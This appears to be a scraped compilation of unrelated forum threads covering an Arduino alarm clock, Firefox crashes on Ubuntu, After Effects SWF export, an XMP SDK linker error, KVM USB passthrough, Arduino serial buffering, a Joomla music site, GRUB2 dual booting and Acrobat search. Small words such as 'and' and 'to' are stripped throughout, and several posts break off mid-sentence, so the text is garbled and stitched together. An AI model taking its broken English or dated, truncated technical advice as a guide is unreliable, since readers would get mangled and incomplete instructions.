i want make alarm clock. thinking ahead here. going have tft touch screen shield, rtc, , buzzer. oh, , arduino. should combine shield or make standalone areduino? got program called fritzing nice. should order customer pcb solder parts to? the tft screen you'd want mounted directly against front of housing won't want components mounted on same board.  buzzer come pair of wires , ideal mount separate issue inside housing.  rtc comes on it's own little pcb that's nice , easy mount separate item. no need make separate pcb.  not difficult totally unnecessary. Arduino Forum > Using Arduino > Project Guidance > Hoe to Finalize project? arduino

Thread: I need a new Browser !

bonjour, looking new web browser work in ubuntu. firefox 3.5, lovely, give me time make cup of tea while start ! it's ready before tea ! main problem before tea got drink, firefox had crashed many time ! saying unstable under statement !!! so, 1 knows browser not take day switch on , not crash every 2 mn ?...and don't mention opera 10 please, not mr ubuntu best mate! merci ! ive been having problems 3.5 also. epiphany same firefox more stable @ moment Forum The Ubuntu Forum Community Ubuntu Community Discussions The Cafe I need a new Browser ! Ubuntu

AE Tryout hängt sich beim swf export auf

hi ich habe mir gestern die tryout von adobe after effects herunter geladen.. da ichs hauptsächlich (wenn) für effecte in flahs nutzen möchte habe ich natürflich den export als swf ausprobiert. habe ein neues projekt erstellt darin eine komp. habe ein bild importiert (png) habe einen effekt hinzugefügt "wellenwelt" hab nochetwas den einstellungen rumgespielt und wollte es dann als swf exportieren... bis zur eingabe des dateinamens komme ich wenn ich dann auf speichern klicke sollte doch eigentlich ein fenster mit enstellungsmöglichkeiten erscheinen (sah ich zumindest in einem videotutorial so) aber das erscheint schon nicht mehr. after effects macht einfach nichts weiter dann, im taskmanager steht es mit 60-80% cpu auslastung wenn ich win anderes fenster drüber öffne bleibt dessen inhalt wenn ich es wieder minimiere auf dem save file menü hängen und das wars...habe eben nochmals versucht 10 minuten gewartet aber dann hab ich den prozess im task manager abgebrochen. liegt

StandardSchema Sample not compiling

i'm trying compile standardschema comes xmp under sample directory. keep getting this.. build log --------------------configuration: basicschema - win32 debug-------------------- command lines creating temporary file "c:\docume~1\e465278\locals~1\temp\rsp852.tmp" contents [ kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /nologo /subsystem:console /incremental:yes /pdb:"debug/basicschema.pdb" /debug /machine:i386 /out:"debug/basicschema.exe" /pdbtype:sept ".\debug\basicschema.obj" ] creating command line "link.exe @c:\docume~1\e465278\locals~1\temp\rsp852.tmp" output window linking... basicschema.obj : error lnk2001: unresolved external symbol "void __cdecl serializemetaxap(class metaxap &,unsigned char,int)" (?serializemetaxap@@yaxaavmetaxap@@eh@z) basicschema.obj : error lnk2001: unresolved external symbol "void __cd

Thread: USB passthrough using virt-manager 0.7.0, karmic 64

trying usb passthrough working kvm virtual machine usb scanner. upgraded karmic beta latest virt-manager 0.7.0, support adding physical device. i'm able add scanner new physical device through virt-manager interface, nothing happens. had success adding device in virt-manager? couple days ago i've had same problem, spent several hours make work! thing apparmor. should go /etc/apparmor.d/abstractions/libvirt-qemu , uncomment lines there, read comments in file. , check if have hald installed. virsh (libvirt) relies on host hardware list. "virsh nodedev-list" has list host's hardware. Forum The Ubuntu Forum Community Ubuntu Specialised Support Virtualisation [SOLVED] USB passthrough using virt-manager 0.7.0, karmic 64 Ubuntu

Serielle Daten im Hintergrund Empfangen und im Puffer speichern

hallo, ich dachte seriell gesendete daten werden im hintergrund empfangen und im pufferspeicher abgelegt. ich sende auf knopfdruck seriell daten (5byte) mein arduino mega 2560. ich verwende die serial3 schnittstelle. die daten werden einmal in der loop eingelesen. anhand der empfangenen daten wird ein case aufgerufen. einige case sind sehr zeitkritisch da ich sehr viele daten auf led-stripes schreibe. dass ich nicht öfters die serielle schnittstelle auslesen kann oder  interrupts verwenden kann. ich  lese die daten mit: serial3.readbytesuntil(';', data, 5); nextcase=atoi(data); ein. leider erfolgt aber in rechenaufwändigen cases keine Änderung. es werden keine neuen daten eingelesen. welche lösung gibt es? danke  marie readbytesuntil() ist problematisch am einfachsten geht es so: code: [select] const int serial_buffer_size = 10;     //bei mehr daten die größe hier anpassen char serialbuffer[serial_buffer_size]; void loop() {     if(readserial() ==

Help Regarding joomla Website - Joomla! Forum - community, help and support

Image
hello guys, i thinking of starting website functionality code: select all http://smashits.com or http://raaga.com where user can select song play , should open in different window in player. the site developed in joomla(my favorite cms since 6 months). need suggestions on "components/modules" use , resource links regarding same.the site might not huge sites provided above want similar kind of functionality. also example sites in joomla (if developed before) can refer structure .this great me . thanks in advance, sam. the site mentioned abve code: select all http://www.smas hits.com/ (wo space in between filtered cose of bad word filter lol  :p) Board index Joomla! Older Version Support Joomla! 1.0 General Questions - 1.0.x

Thread: How to Dual Boot Ubuntu Karmic and Windows XP

hi folks, have 2 hard drives: sda -> runs ubuntu karmic sdb -> runs windows xp pro knows how can dual boot 2 hard drives under grub2? using jaunty following menu.lst windows hard drive , worked flawless me: code: title windows xp pro root (hd1,0) savedefault makeactive map (hd0) (hd1) map (hd1) (hd0) chainloader +1 i know need modify /etc/grub.d/40_custom tried copy code above , did not work. ideas? in advance, ak ive found easiest way install windows first. install ubuntu , grub take care of itself, @ least did me last night on a sony vaio partitioned 2 100gig sections, 1 windows , 1 ubuntu. Forum The Ubuntu Forum Community Ubuntu Official Flavours Support General Help [SOLVED] How to Dual Boot Ubuntu Karmic and Windows XP Ubuntu

Fixed search engine

adobe acrobat professional 8.0 on mac os x 10.4.9 not allow search , particular character/s or words. instance, searching "and" (no quotes) finds word containing "and" (no quotes) inside. besides, not possible search strings or sentences using quotes. finally, there no way perform searches words containing non-ascii characters accented characters. words or without such accent found hits. same other non-ascii characters. thanks. More discussions in Acrobat Feature Requests adobe